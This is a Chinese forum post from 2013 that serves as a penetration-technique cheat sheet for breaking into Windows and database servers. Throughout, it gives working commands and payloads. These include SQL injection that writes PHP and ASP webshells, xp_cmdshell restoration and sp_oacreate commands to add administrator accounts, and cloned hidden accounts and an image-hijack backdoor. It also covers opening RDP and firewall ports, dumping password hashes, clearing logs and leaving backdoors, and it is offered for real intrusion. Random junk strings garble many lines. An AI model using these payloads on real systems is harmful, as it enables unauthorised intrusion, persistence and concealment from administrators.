中国网络渗透测试联盟

标题: 渗透技术大全 [打印本页]

作者: admin    时间: 2013-2-27 21:24
标题: 渗透技术大全
3 r. Y% y" L( _3 u1 |) H
1.net user administrator /passwordreq:no
3 `! X3 S( H. q, h这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了) b3 d+ a& ~' s# K. O
2.比较巧妙的建克隆号的步骤9 L, j5 G& r% Y3 `
先建一个user的用户: r- I9 s0 F/ |/ a; T  ^
然后导出注册表。然后在计算机管理里删掉1 n8 ^7 i$ j! }$ K$ ?7 K
在导入,在添加为管理员组! Q, l6 \/ c% _# H$ p+ R9 q- c
3.查radmin密码/ A2 x& \, e) c1 n* X1 I0 F6 D
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg" Q" A2 H6 ?3 N7 G$ s; r. p" Z
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]6 J# Z# L4 y$ v0 `
建立一个"services.exe"的项; l0 l6 H4 Z  q6 U# U3 o
再在其下面建立(字符串值)
) Q# s; U9 L* v键值为mu ma的全路径  C( N4 A! E/ l1 l% ]' C% d) J
5.runas /user:guest cmd( ~  ]& K' P  U8 Z" j
测试用户权限!6 [* G+ j6 R5 c0 |/ g6 |. ^. _3 C
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?1 w; u1 G) _% p( f' r1 F8 u" Y
7.入侵后漏洞修补、痕迹清理,后门置放:  g! J; r" U) l) B" e* ]
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门1 R: G  H. c0 q/ s* B
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
+ x( R( y$ X: }, c, w& n& _- |- P4 r; J# m* R0 }! b
for example
/ D4 v- O& ~& M; a/ x" I' a7 a# I
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'; m  ?5 G+ a: \$ L# }+ v- l# S/ h
6 V9 w+ u& W% _3 L, W8 U5 O. s
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
) g( J- h% ^& z% W. k5 G  O! ?% N
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了2 a" D3 k& `" \# d# A' M
如果要启用的话就必须把他加到高级用户模式" J% b/ G" f0 _2 w# j" i4 d
可以直接在注入点那里直接注入0 N% y' j4 j2 @( ]! c  I: W0 m
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
! l9 E* y+ c. T, Z然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--& V+ W/ C1 h8 g2 W
或者
* D6 |- q- V. Q& Asp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
) f3 y1 B1 K# q8 C9 O2 n9 {来恢复cmdshell。
# h. m$ b9 G( Q0 G5 q6 y/ Y5 g' _$ t6 K6 v. D0 I. y& ?; t
分析器& P# r: o/ @6 l& o
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--6 A" c* f$ a5 ]  m. M; q
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")+ j) _/ O' H$ A  Z) j: `  k7 c
10.xp_cmdshell新的恢复办法
8 ]1 u  r& e9 P: F" w5 D* S4 hxp_cmdshell新的恢复办法
1 Q5 x; r/ C' P: w3 A扩展储存过程被删除以后可以有很简单的办法恢复:
4 u- l! `3 i- o删除
+ G! b2 }- J) ^& P$ Vdrop procedure sp_addextendedproc
2 H6 ~0 u4 w) z1 X% Z: L$ Idrop procedure sp_oacreate
  f; M/ Y; n0 I9 oexec sp_dropextendedproc 'xp_cmdshell'
1 `. W/ t0 z* ^# b' J( G7 z$ \( D8 W( ~) t+ d
恢复6 L" t  [* K! p5 l; E& T: n' T- B/ f
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
+ M# v9 R# }7 X! y/ D) S8 _8 Q# I% Pdbcc addextendedproc ("xp_cmdshell","xplog70.dll"). S% [9 G- v3 p  N* o: n7 j

" l9 _0 e3 G4 }( p/ C- K这样可以直接恢复,不用去管sp_addextendedproc是不是存在6 L: z* R$ O5 x1 E" N
9 }/ \% ?9 U; O; @# d# `$ V
-----------------------------
- ~5 V6 s  w  J2 G
' \0 t$ p. k0 U# j8 E! p删除扩展存储过过程xp_cmdshell的语句:" D% R6 z# |. t9 Z* R- P
exec sp_dropextendedproc 'xp_cmdshell'8 n0 O- [7 n9 G/ ^* f, }

- p7 j0 s. s- U0 |- k恢复cmdshell的sql语句$ r7 c4 L4 c5 H2 Z
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
" m9 x' L* p0 c
8 k! Q& u  I4 R# h' V* D* b
5 n* d; c$ z7 w; [0 A: G, X" V: d开启cmdshell的sql语句
! O7 q" g; |+ T# O/ _' x( o1 X' g& j$ }1 ~' s4 L0 j# Z  E( H
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'2 ]; h/ F6 j: G1 }3 F

  ?9 K9 E/ F) m& H* O& I' P判断存储扩展是否存在& r: c0 E4 d9 M1 L
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
3 [. v' N( R0 a, Q返回结果为1就ok+ a: O# i% {" u; S7 m3 b( q1 K

( K8 b% u" K9 x! J% |. n" |恢复xp_cmdshell$ \. o  W8 _9 T7 L
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
7 F0 {* h9 u) H返回结果为1就ok( S- r3 S1 b! [* X5 ^
9 U/ ^" ^, o+ f" N4 z; Z7 t/ W
否则上传xplog7.0.dll
' F7 q9 q0 L: j, _6 B7 h* j- Aexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
7 l( `) u6 i' l4 R' u, w
# [2 x; M, l, e; H# S堵上cmdshell的sql语句& I* w' K9 ~& |( f
sp_dropextendedproc "xp_cmdshel
: P, G8 |7 _& n$ |$ y-------------------------
) M: t0 r- p& r) A% D" `; G清除3389的登录记录用一条系统自带的命令:. j; A8 {1 t2 a/ g' O
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f* Q8 U6 u/ r$ l# R" ~

) f* }+ X8 e, t7 T& ?/ a2 `* U0 o然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件& a" Y1 y% N+ |2 X
在 mysql里查看当前用户的权限
6 _8 w1 J+ _9 G9 k4 l: }0 b& X; xshow grants for  . S/ @; h: y  ?
3 U$ w/ x) t1 S& [& [" D+ D
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
& B6 _% E* {# V4 F5 e$ Q3 O: P( c7 q3 |8 r* `9 v# ^# Q

; ?  i5 C2 n( m0 G0 ^: ], aCreate USER 'itpro'@'%' IDENTIFIED BY '123';
0 I; `$ d( C3 B1 y/ ?* ]9 U2 n: {# o# v" R% d
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
) u) G% A1 {9 Y  x. n/ i9 g9 v0 M8 v2 I
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0% A5 g8 G2 o) O1 M9 }

& T0 X9 f8 c9 Z$ \& `MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;# Z0 A+ D7 J# T- M$ r! M. y
' R  X- W  A! E- e) o
搞完事记得删除脚印哟。
5 c. H3 E8 ^7 P( e; f$ R7 S7 ?0 {/ T/ E" B: p, }0 g) v9 c1 R% u
Drop USER 'itpro'@'%';
7 m- G6 j6 I/ \
3 ?4 N( |5 X$ _% E( eDrop DATABASE IF EXISTS `itpro` ;
5 V: Y3 \# x1 |) [) r; }6 M: x2 @9 v5 v2 C: x
当前用户获取system权限. _: Q  K' S. O- Q' K1 ^
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact# K& N9 N9 r6 X. e5 V
sc start SuperCMD% o" S+ g% N9 \& C
程序代码7 ]- B' Q$ I6 K) u+ o
<SCRIPT LANGUAGE="VBScript">
) @: d3 f  m. U" d( Y+ B* `set wsnetwork=CreateObject("WSCRIPT.NETWORK")
3 Q' S! g) `3 c  s+ Uos="WinNT://"&wsnetwork.ComputerName
3 R+ d% H2 _" O7 aSet ob=GetObject(os)
; N4 M  l0 e% [- cSet oe=GetObject(os&"/Administrators,group")% ?4 i4 @* g+ Y
Set od=ob.Create("user","nosec")
3 X# C0 @0 D- @od.SetPassword "123456abc!@#"1 F, t/ s0 w% y! S
od.SetInfo! y4 h: r# s' C6 ?; A
Set of=GetObject(os&"/nosec",user)
/ V1 T6 s8 ^" y, j' j+ Eoe.add os&"/nosec"! c! W1 G0 B( c1 c( w3 l) k
</Script>! H: u6 n, B; L: R
<script language=javascript>window.close();</script>, Q; f7 a- h) S+ i
4 |  Z/ ~. e+ k2 A
% D! ]- F3 g( C1 V1 q

! ^4 z9 H  m8 h+ [3 ^- ^- I
( E" H" y* G0 W. E, _/ u& \- ~突破验证码限制入后台拿shell$ z; h6 q; f( c. m8 i7 v) J, }
程序代码
9 _( t. [4 E* E" d/ TREGEDIT4 3 f  y/ q; M/ b! G  Y: w- d# y
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
( e* }9 n3 _# n, M' X7 v"BlockXBM"=dword:000000002 G. m& ?  g( ]8 N" X4 E) ~  P& ^& t
1 D! {7 F+ @- o/ S8 Q
保存为code.reg,导入注册表,重器IE& s# l. ^5 W, J1 M1 s/ H
就可以了
+ m( U4 \0 X3 j& @union写马
* n5 c3 E6 h3 y/ n5 Z. U$ g& q% ~程序代码* ^' E) ^* U0 S( c. x, O
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
4 |: I' b6 L/ K. V2 E  N. p9 _' t# |# b$ C
应用在dedecms注射漏洞上,无后台写马3 Y) i0 s5 D- L* u6 [
dedecms后台,无文件管理器,没有outfile权限的时候& Y3 G6 _1 M3 u0 u& N8 n7 n
在插件管理-病毒扫描里
; m7 |; z3 K: D/ N9 a& w, Y0 x写一句话进include/config_hand.php里
1 c0 U# C# s' R程序代码' ?: c  N3 i; s7 T& K/ u
>';?><?php @eval($_POST[cmd]);?>
+ k- G3 m& J- {( L7 V
( b: m8 a5 Z# |5 s5 g+ K& g0 T# b% o& m' D
如上格式9 c) v0 [# H$ _5 o. H

& D) n" h/ S4 e. z' A7 Moracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
7 K( `1 J+ E! ^; E; x) I程序代码
6 r% w3 h3 m; Jselect username,password from dba_users;
' H! q# Y) {' p/ I5 x; g1 y
: v4 k" g- u% E! O+ D; [- p4 g! \/ i6 q  @& I
mysql远程连接用户) R( D% p* F4 @9 E! Q' F9 O
程序代码$ ^4 m1 Y; a4 i0 y" N
: q* |- _: [; ^: i" J" g
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';$ H) N! z2 Q. e- E
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION1 ^( j% T( {" K* j" S1 i' _. Z
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0+ I0 b! c9 h3 j  a
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;0 B# F( G0 s& s4 `. d& P
! j/ j7 @. x* E
% q( S" Q) o6 s2 {/ D  Z
% O1 [# S, b$ Q! P

. S' m+ [' \0 K* n% X; A) }echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
, d& e* k5 {4 t; p- r. H( L# i
5 E! ^8 P! _! m- j1.查询终端端口
6 l) }7 l+ `, v7 ?7 @9 R, F) S2 E' f/ a% d
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
! n/ F( x' ]- V! A- O7 _6 m5 G& I) W! q7 s
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
6 N" A9 {+ U. }8 V7 Itype tsp.reg
+ Q  a9 i1 D) F5 Q2 `# c5 m, M. |7 I! S0 x* U5 K/ h9 A
2.开启XP&2003终端服务
2 u3 L( _8 L2 R) D" T  r, |- p! o1 `5 ^2 S9 T) D9 r, p; |* e
! X6 e5 o# z% O5 \
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
! {( ^- A: y! a9 n( N
! x: H% S& ?. n
4 z" S4 c2 M/ h3 ?3 p1 |! y7 ^7 AREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
. @, }" b  ~9 u0 z! ]. d, m$ ^0 v, \& n# |9 |# q! v% p
3.更改终端端口为20008(0x4E28)
* l3 r" s. p/ g7 A$ v, K( K( b. Z' u! ]1 `" J+ A
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
; Q3 d* x, K" I+ {$ c8 U: x& {3 s1 m  a9 R: A
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
& l& k$ l! y$ J3 T
  m+ k/ ~5 U2 ^2 @4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制6 B; x- h! W2 A- R, C) ]
  ]2 V5 A! Z9 y# b
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
) j& c  I) j* t) D* y8 [+ n' F9 m+ _9 M  i  J8 i( C4 u

5 j7 X4 j8 Y' T4 E$ ~: G5.开启Win2000的终端,端口为3389(需重启)
2 N3 r- l/ u& H- T1 c* O( f! i! ?6 o
echo Windows Registry Editor Version 5.00 >2000.reg
. {2 A. G) q, Q! _+ r  Iecho. >>2000.reg
( A: G2 W8 u! W" cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
4 _% T/ L6 y/ b$ e  L; |9 becho "Enabled"="0" >>2000.reg
8 c/ N  C9 X6 Z" I4 D9 `, {5 recho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
8 i# J" v' ~- Z0 Kecho "ShutdownWithoutLogon"="0" >>2000.reg
9 x: i0 d" C3 D6 d1 q5 s) O$ Jecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
! Q, P& k' Z9 I7 X6 {- d6 b1 Y+ Uecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg / S# ?3 Z! g) e+ q  a
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
% G$ O: c' i; G6 qecho "TSEnabled"=dword:00000001 >>2000.reg
, {4 J& Y+ h. }: Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ; o( H+ _9 G. _  [2 y% s5 }
echo "Start"=dword:00000002 >>2000.reg
( u$ P' O/ X/ X3 k0 B/ o( }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg . v0 t% e, r8 j- V" M6 e  N( }1 A) w3 Y
echo "Start"=dword:00000002 >>2000.reg & h0 f9 ?' k; {* c
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg - }: }4 z4 Q4 Z
echo "Hotkey"="1" >>2000.reg
; s0 K. [& e4 [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg * v1 f3 K9 j9 W( d5 r
echo "ortNumber"=dword:00000D3D >>2000.reg 1 D9 I  {4 o' H* ]! z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg ; S- S% k; w' L: E
echo "ortNumber"=dword:00000D3D >>2000.reg' j4 W) g9 i; M- x( I

( j  G; M' Q$ @. B+ {# }* J6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启), L+ Y4 h1 x: P5 l; S$ s: s
* f: E+ E/ V8 {  t1 v
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf: \* X; l3 j* P& d5 ^( D
(set inf=InstallHinfSection DefaultInstall)# e) a! ?4 g( o5 t" r3 K& N( ]: U
echo signature=$chicago$ >> restart.inf
! f6 K" i' F% e; q/ t5 Lecho [defaultinstall] >> restart.inf5 @9 b' C' D6 W: ~& o
rundll32 setupapi,%inf% 1 %temp%\restart.inf
# i; m: k2 i& M
$ v5 e8 t' Z' B( h, B6 n
/ T1 D1 a* K, B+ X. v" P7.禁用TCP/IP端口筛选 (需重启)' B% S. w+ `9 A- _1 C
6 f/ u( L9 a/ y! t8 [
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
) h' j6 A, d4 s: u' G* c% g( \, s1 b. f8 u+ o5 `
8.终端超出最大连接数时可用下面的命令来连接
" ~8 P9 x& L5 V/ \0 X6 D. e3 P$ Z' |9 d/ i8 W
mstsc /v:ip:3389 /console
8 e+ E9 R1 m7 E
3 G' H' v% y4 X- M+ t* J" [3 S9.调整NTFS分区权限
! v2 e2 g' }6 G3 Y
6 u$ u' g- {: ncacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)( W! y" d! z, g% N9 P6 M7 U
4 @. J. P) P( }: O: C" d' v( ]
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
8 d( V7 Z3 Q: @/ G) f) W, B" t) G6 p7 D6 z5 T
------------------------------------------------------
. \5 X; D" l4 p3389.vbs
# e; A% i% }, w# ~: O5 bOn Error Resume Next* l6 c/ T: `$ H
const HKEY_LOCAL_MACHINE = &H800000024 e1 R0 U6 |$ ~2 k$ o- B
strComputer = "."
# v4 N+ Z" W: L" F# b! GSet StdOut = WScript.StdOut
/ Z8 v, x2 `0 ^& }( ySet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_- f3 }; P4 ?# y$ Y" ]1 C. I
strComputer & "\root\default:StdRegProv")0 B9 @1 B" i* Y% q
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
4 K9 y3 L( G+ n, l. G+ Loreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath) ?) k* T: i7 q% c3 J
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
( l2 d" X6 O  zoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
$ H5 k5 B% q( \strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"( B1 [2 z! [% h* D+ G6 m4 r2 Z
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"5 {/ m* T" A3 z7 Q4 u, w
strValueName = "fDenyTSConnections"
& K; n" p4 r4 ~dwValue = 06 ?# Z5 s, w  N: ?9 x8 c) {
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue/ {! s- k. O, ~; _
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"9 o' r8 O9 z2 R2 B
strValueName = "ortNumber"4 B1 G" L, D& t3 }
dwValue = 3389; T9 j+ ?# c6 n0 n
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue, D& u) Z' b1 a0 b4 [3 Q
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
: M$ S$ o1 j! Y* zstrValueName = "ortNumber"
& Z& n& k) u0 v* |dwValue = 3389
& y# ~7 ^' @. k# c. J0 zoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue" H  _) r9 K2 k  H: L
Set R = CreateObject("WScript.Shell") ( G, W/ z- a2 F( J6 B
R.run("Shutdown.exe -f -r -t 0") 2 a% l1 @. g/ f2 d3 r

/ t" ~! ?6 t5 x3 _4 E& ~' g( |删除awgina.dll的注册表键值  I: z5 S* q1 a1 d& @! N1 B
程序代码: ~' t6 c; k' b( r1 H* s" X

( ]- p8 {! o' L" s% lreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
! S; i+ G& \. C6 b# M  z2 M5 _6 z  i) l# [$ j5 {7 K

/ k. X: D2 `* }9 J; p1 ?) @' b$ }$ Z+ V# j1 X

" `7 Q, W; q( o0 z程序代码7 q7 I9 u+ R3 q& C8 c/ d, Y, t& u
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
% H6 p0 b7 r) x1 m
; Z& ?  d* _; z0 c$ G: a8 Q; \7 g! J设置为1,关闭LM Hash1 |- H+ q+ @7 V( [8 G8 t, c
! v4 x3 o6 g; C8 b; z) I
数据库安全:入侵Oracle数据库常用操作命令1 H- t* |" f$ [6 E
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。* H3 O; [* C4 N0 l3 v) R$ K
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。) K! {; M1 u) g( N, d1 u% t
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
, S7 ?$ @" E7 |" L3、SQL>connect / as sysdba ;(as sysoper)或( N) o" I3 ^( F, ^. p% e1 T
connect internal/oracle AS SYSDBA ;(scott/tiger)6 r! A! M* C0 L, c0 y8 s% ]; i
conn sys/change_on_install as sysdba;6 D, l& W4 I4 v; x
4、SQL>startup; 启动数据库实例7 W' g7 S$ M# S; T0 q. C* ~
5、查看当前的所有数据库: select * from v$database;6 h. M: d; t6 \" L8 Q( h
select name from v$database;" h" v" p8 s2 D% \/ z
6、desc v$databases; 查看数据库结构字段
+ s, W! m* X. _8 w# E5 B5 O+ W7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
! h$ J6 \" P7 ~" _6 \) U  FSQL>select * from V_$PWFILE_USERS;+ @9 i* g; J9 g6 e. ^
Show user;查看当前数据库连接用户1 H; e3 F$ Y0 V( j  w1 l, r' M+ s
8、进入test数据库:database test;
- i* O. S0 p$ I9、查看所有的数据库实例:select * from v$instance;1 P3 ^* ?+ u$ c4 Q. B
如:ora9i
: ^* D+ t3 a: ?0 q+ [5 F0 d) q* I10、查看当前库的所有数据表:6 y7 b4 Y; l, t! F- u+ U
SQL> select TABLE_NAME from all_tables;( F+ X0 L2 g2 p+ m" C+ d
select * from all_tables;9 |9 r) f/ @/ F4 d# Y/ D2 s' `2 x+ F; n
SQL> select table_name from all_tables where table_name like '%u%';/ u6 z7 f& U* f: Z& k( P4 W6 H( t! R" G* D7 c
TABLE_NAME" z( n  Z$ z! p* `% O9 J
------------------------------4 N3 W, E) ]0 [5 ]) F" A* [! v
_default_auditing_options_7 f7 ^* ~9 p0 n
11、查看表结构:desc all_tables;/ k# z6 T+ B9 W8 \+ p$ A6 n
12、显示CQI.T_BBS_XUSER的所有字段结构:
; |9 X- c1 X0 \( K/ Rdesc CQI.T_BBS_XUSER;
1 U3 \: S9 \/ F2 s! q. h13、获得CQI.T_BBS_XUSER表中的记录:: t. u1 }, \; c4 j
select * from CQI.T_BBS_XUSER;
( C5 T: s: `. H. u* E! \% r; d9 ~14、增加数据库用户:(test11/test)
/ L! L1 {6 f. {$ h5 ncreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;* Y% E5 P* z* s5 Y. Q- x* L7 L
15、用户授权:0 s! W$ s4 R! l0 A
grant connect,resource,dba to test11;' p+ D6 [' z: L6 G% N9 w' x8 v
grant sysdba to test11;, K5 _2 |/ p( M( w# k
commit;
, A8 l- k7 f  D16、更改数据库用户的密码:(将sys与system的密码改为test.)
$ g$ _# ^9 I& n/ l1 H  e% y# k- \alter user sys indentified by test;* D3 M. w4 k8 \3 Q) ?' w) B
alter user system indentified by test;7 i! d$ a: u9 B' p8 ^2 S2 W1 A2 P

8 d/ m1 F7 T( f& q' ~# |applicationContext-util.xml0 K  n% y8 U7 W& \5 G8 ~
applicationContext.xml1 w" M1 c, k! c& b. b% L
struts-config.xml7 X5 n* y' V# G
web.xml  l( L' H3 ]- w4 q1 ^: j8 O2 F
server.xml
5 l7 c" G, F6 ?/ Ftomcat-users.xml+ ?( H. h" k- L, p
hibernate.cfg.xml
! m; p% S# X" k& p: m( Hdatabase_pool_config.xml8 M4 O7 q; P' ?
2 k2 [, H( r2 S3 T8 A8 M6 M. b: g7 Z
/ g0 ]7 s3 H( w0 i5 ~! A
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
' F7 a% ~2 W4 p! H\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
! o/ f3 _0 Y, _: \0 d" _# J\WEB-INF\struts-config.xml  文件目录结构# M9 K/ \# G; ]3 {' ?
! J  c. G3 o1 }& l; e# S$ Y
spring.properties 里边包含hibernate.cfg.xml的名称9 f9 i- v4 ]* m4 s  s, v* i) L, Q
7 `1 L: C! u7 m7 ]: J( ?

. n7 s/ d, R: _3 eC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml9 m9 @2 j2 a; x! _* N4 i: g& V) g
5 p# q$ R* n) t4 V* M8 J
如果都找不到  那就看看class文件吧。。
2 {$ x+ b* X% Y7 _6 a; _1 T: S" u' |
9 d$ T) n/ o1 w9 w3 k/ _. ~' x" B测试1:& H  M, z2 N, u( @
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
" U+ |, p2 s9 B
$ i- \& Q( X6 o) s6 x! O$ p# n  b测试2:, N; h7 b1 r* c; Z* e9 Q5 a) D

2 h. Q2 {1 G" R3 a" pcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
, @( x. h: v1 d, P, ~( k6 I; V, @+ a
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--; j+ A; D9 d4 I" J% F

( ^1 w( W7 ]8 ]1 VSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
  v+ n0 _; r& @: F( b# E/ u
" _, w9 S8 {: t9 @2 y, _查看虚拟机中的共享文件:! {7 E. ^) ~, r/ }- A
在虚拟机中的cmd中执行
8 }* J8 M) H0 l" r3 y  h7 `2 u\\.host\Shared Folders
1 A" @$ u: H- V- A5 C( ]0 M8 t) U7 S! {; j0 J% t0 Z; n
cmdshell下找终端的技巧
1 n3 L8 n$ N6 t7 ?找终端: ' K; Z0 X8 c6 u: _! {
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
$ J# s9 f- @+ H# A   而终端所对应的服务名为:TermService
, J5 s% F6 H* |) u4 ?( f第二步:用netstat -ano命令,列出所有端口对应的PID值! & f/ I, s& j# U
   找到PID值所对应的端口( d8 f# E$ N$ W, c# V, f
$ l, F5 k: F. e
查询sql server 2005中的密码hash* ]- u! O7 b& g. G1 m7 S2 Y; K' N9 u
SELECT password_hash FROM sys.sql_logins where name='sa'2 i" W+ f9 E0 F$ [% D1 S! i* Z0 G
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a$ b* `( L# R$ z/ v1 p4 X
access中导出shell- L& Z' ]6 N5 i: i  f! V' |
